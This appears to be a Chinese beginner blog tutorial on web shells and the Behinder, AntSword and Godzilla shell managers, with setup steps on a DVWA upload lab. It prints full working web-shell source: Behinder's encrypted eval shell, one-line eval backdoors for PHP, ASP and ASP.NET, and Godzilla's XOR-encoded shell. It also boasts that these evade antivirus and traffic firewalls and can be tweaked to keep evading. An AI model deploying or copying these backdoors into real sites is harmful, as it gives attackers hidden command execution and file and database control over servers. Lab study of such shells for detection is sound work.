Web shell 与 冰蝎、蚁剑、哥斯拉(新手必看)
一、Web木马的概念
web木马:用Web系统语言(如:ASO,PHP,JSP等)编写的木马,木马上传服务器后当成页面被攻击者访问,常当做后门.
Web木马危害: 做后门; 文件,数据库操作; 修改Web页面
二、Web木马的特点
- Web的特点一:Web木马可大可小
- Web的特点二:无法有效隐藏
- Web的特点三:具有明显特征值
命令执行函数:ebval,system,popen,exeshell_exec等
文件功能函数:fopen,opendir,dirname,pathinfo等
数据库操作类函数:mysql_query,mysqli_query等
- Web木马的特点:必须为可执行的网页格式
三、Web木马常用工具介绍
Web木马常用工具有三个:冰蝎(Behinder 3.0)、蚁剑(AntSword)、哥斯拉(Godzilla Shell管理工具)。接下来 逐一介绍工具的下载、使用方法、特点。
3.1、冰蝎(Behinder 3.0)
下载地址:https://github.com/rebeyond/Behinder/releases/tag/Behinder_v3.0_Beta_11
建议安装环境:虚拟机Win 7 关闭防火墙状态下 下载及安装。
2、下载并解压后的文件含义:
① Server文件夹:存放着不同类型的 shell 脚本
② Behinder.jar :冰蝎的运行程序
③ Behinder_v3.:源压缩包
④ data.db :配置文件
⑤ 更新日志.txt :版本更新修复的问题
3、冰蝎使用方法
这里我们借助 靶机:DVWA 其中的 文件上传漏洞( low 级别) 做实验。来解释冰蝎的使用方法。
① 将 冰蝎 中存在的 shell 脚本 上传到网站上。点击 浏览 选择 :shell.php 然后上传 并且复制上传路径。
② 复制该文件 上传 的完整路径。
③ 打开 冰蝎,空白处 右键 选择新增,将完整路径输入 这里看到是需要密码的 密码放在 shell 脚本里面。
④ 我们使用 VSCode 查看一下脚本。
⑤ 输入 密码 其他默认 保存后双击查看 是否连接。 连接成功后可以看到刚才输入的 URL 后面会显示已连接,也有很多模块 支持我们进行管理。
4、冰蝎特点(总结)
- “冰蝎”是一个动态二进制加密网站管理客户端,由于基于流量加密的webshell变得越来越多,"冰蝎"在此应运而生。
- "冰蝎"客户端基于JAVA,所以可以跨平台使用,最新版本为v3.0 bate,兼容性较之前的版本有较大提升。
- 主要功能为:基本信息、命令执行、虚拟终端、文件管理、Socks代理、反弹shell、数据库管理、自定义代码等,功能非常强大
- 冰蝎的加密原理:"冰蝎"在服务端支持open_ssl时,使用AES加密算法,密钥长度16位,也可称为AES-16。此在软件及硬件(英特尔处理器的AES指令集包含六条指令)上都能快速地加解密,内存需求低,非常适合流量加密。
- 三大特点:
- 流量加密,难以被检测
- webshell免杀性好
- 加密方式:AES加密
shell.php 源码奉上:
<?php
@error_reporting(0);
session_start();$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);
?>3.2、蚁剑(AntSword)
源码下载地址:https://github.com/AntSwordProject/antSword
建议安装环境:虚拟机Win 7 关闭防火墙状态下 下载及安装。 具体安装就不多讲了
蚁剑下载地址:https://github.com/AntSwordProject/AntSword-Loader
2、下载并解压后的文件含义:
① AntSword-Loader:包含运行程序和配置文件
② antSword-2.1.9 :原压缩包 及版本号
3、蚁剑使用方法
这里我们借助 靶机:DVWA 其中的 文件上传漏洞( low 级别) 做实验。来解释冰蝎的使用方法。
① 将一句话木马 放入 记事本 并且 修改文件名为:1.php (重点是修改后缀)
② 上传我们 做好的 马 复制路径
③ 打开 蚁剑 的运行程序 输入路径 和 密码 细心的小伙伴 肯定发现 密码在哪里了。
然后点击测试连接 会弹窗 提示 连接成功 成功 后点击添加。
④ 添加好 之后 双击打开 就可以管理 文件了。
4、蚁剑特点
- 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
- 通俗的讲:中国蚁剑是一款比菜刀还牛的 Shell 控制端软件。
- 中国蚁剑推崇模块化的开发思想,遵循开源,就要开得漂亮的原则, 致力于为不同层次的人群提供最简单易懂、方便直接的代码展示及 其修改说明,努力让大家可以一起为这个项目贡献出力所能及的点 滴,让这款工具真正能让大家用得顺心、舒适,让它能为大家施展 出最人性化最适合你的能力!
5、一句话源码奉上:
PHP:
<?php @eval($_POST['chopper']);?>
ASP:
<%eval request("chopper")%>
ASP.NET:
<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%>3、3 哥斯拉(Godzilla Shell管理工具)
下载地址:https://github.com/BeichenDream/Godzilla/releases/tag/v3.03-godzilla
GodZilla 的运行环境:JDK 1.8
2、双击 Godzilla.jar 运行 程序之后 会在 同目录下 生成 data.db 数据库存放数据。
3、哥斯拉使用方法
① 哥斯拉 的 马(Web shell) 是需要自己配置的 。
管理”->“添加”生成所需的 webshell
- 哥斯拉支持 jsp、php、aspx 等多种载荷
- java 和 c# 的载荷原生实现 AES 加密,PHP 使用亦或加密
- 生成时需要记住自己的生成配置用以连接时使用
- 记得点击生成
② 我把这个脚本放到了 D盘 下 起名为:ace.php
③ 还是DVWA 靶机 上传文件
④ 目标 → 基础配置 → 将框选的内容填写修改 有效载荷和加密器 点击 测试连接 连接成功后点击添加。
⑤ 哥斯拉 也有很多 功能模块 自行挖掘吧。
4、哥斯拉特点
- 哥斯拉全部类型的shell均过市面所有静态查杀
- 静态免杀这个问题,要客观;工具放出来之后可能会免杀一段时间,后来就不行了,但是,改改代码还能继续过狗。重点还是要看流量加密和一些自带的插件。
- 哥斯拉流量加密能过市面全部流量waf
- 哥斯拉的自带的插件是冰蝎、蚁剑不能比拟的
5、Web shell 源码奉上
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){for($i=0;$i<strlen($D);$i++) {$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;
}
$pass='verter';
$payloadName='payload';
$key='cb42e130d1471239';
if (isset($_POST[$pass])){$data=encode(base64_decode($_POST[$pass]),$key);if (isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);eval($payload);echo substr(md5($pass.$key),0,16);echo base64_encode(encode(@run($data),$key));echo substr(md5($pass.$key),16);}else{if (stripos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}
}文章较长,感谢观看;小白一枚,大神轻喷;仅供学习交流。
Web shell 与 冰蝎、蚁剑、哥斯拉(新手必看)相关推荐
- 渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析 文章目录 菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析 前言 Webshell简介 中国菜刀 菜刀webshell的静态特征 菜刀webshe ...
- [网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了WHUCTF部分题目,包括代码审计.文件包含.过滤绕过.SQL注入.这篇文 ...
- 渗透测试-流量加密之冰蝎蚁剑
文章目录 前言 冰蝎 PHP冰蝎马 通信数据包 冰蝎初体验 冰蝎攻与防 蚁剑 蚁剑的安装 蚁剑初体验 蚁剑编码器 蚁剑攻与防 总结 前言 一句话木马是一般是指一段短小精悍的恶意代码,这段代码可以用作一 ...
- Web.config配置文件详解(新手必看)
Web.config配置文件详解(新手必看) 花了点时间整理了一下ASP.NET Web.config配置文件的基本使用方法.很适合新手参看,由于Web.config在使用很灵活,可以自定义一些节点. ...
- 蚁剑哥斯拉burpsuite流量记录
文章目录 蚁剑 php 测试连接发包编码器 默认设置 base64 chr chr16 rot13 解码后 解码器 base64 rot13 哥斯拉 php EVAL_XOR_BASE64 XOR_B ...
- Web 安全漏洞之 XSS 攻击,Java 开发必看!
编者说:作为JS系工程师接触最多的漏洞我想就是 XSS 漏洞了,然鹅并不是所有的同学对其都有一个清晰的认识.今天我们请来了@卢士杰 同学为我们分享他眼中的 XSS 漏洞攻击,希望能帮助到大家. 什么是 ...
- Web前端开发的四个阶段(小白必看)
第一阶段:HTML的学习 超文本标记语言(HyperText Mark-up Language 简称HTML)是一个网页的骨架,无论是静态网页还是动态网页,最终返回到浏览器端的都是HTML代码,浏览器 ...
- Web前端新手必看的7种技术,从菜鸟到高级开发的蜕变!
随着互联网发展,Web前端开发逐渐走红.由于大学没有开设前端课程,知识体系不够规范完整,每个人对它的认识也各不相同,加之互联网技术更新迭代迅速今天给你解读一下,学习Web前端的基本需要掌握的知识. 具 ...
- 一些web前端相关网址收藏(新手必看)
1.学习平台或论坛:CSDN.w3school.前端网 .divcss5.w3cHTML(这个和w3school差不多).菜鸟教程.源码爱好者.http://www.365mini.com/ 2.视频 ...
最新文章
- 移动应用开发—— 如何搭建开发大型的应用架构?
- Selenium 页面自动化测试 面试 问题汇总
- ajax java 插件_对JQuery中Ajax应用与jQuery插件的理解与笔记
- 为什么剩余数不能相加_为什么各位之和是 3 的倍数的数能被 3 整除?
- (译)Windsor入门教程---第三部分 编写第一个Installer
- (五)SpringBoot 能挣钱的几个项目!!!
- 实现springboot的starter
- Linux学习笔记Sed最全整理
- 高端大气上档次的官网介绍导航页源码
- MySQL-快速入门(10)触发器
- C++实现经典四阶龙格库塔法解一阶微分方程
- 算法 思维导图(一)
- 如何快速给图片加水印?
- 光伏发电量和用电量的概率预测研究综述(3)
- 2020年宁夏回族自治区水稻种植分布数据
- tomcat监控脚本(监控进程,测试接口,告警动作为发送邮件)
- 天文学 python_4个天文学入门Python工具
- 如何破解Charles4.0.1------超级简单
- nginx本地服务器的搭建(保姆式教学)
- php期末考试题机考_(题目随机,先对题,再下载)1912课程考试[0553]《儿童语言教育》机考答案(见附件)...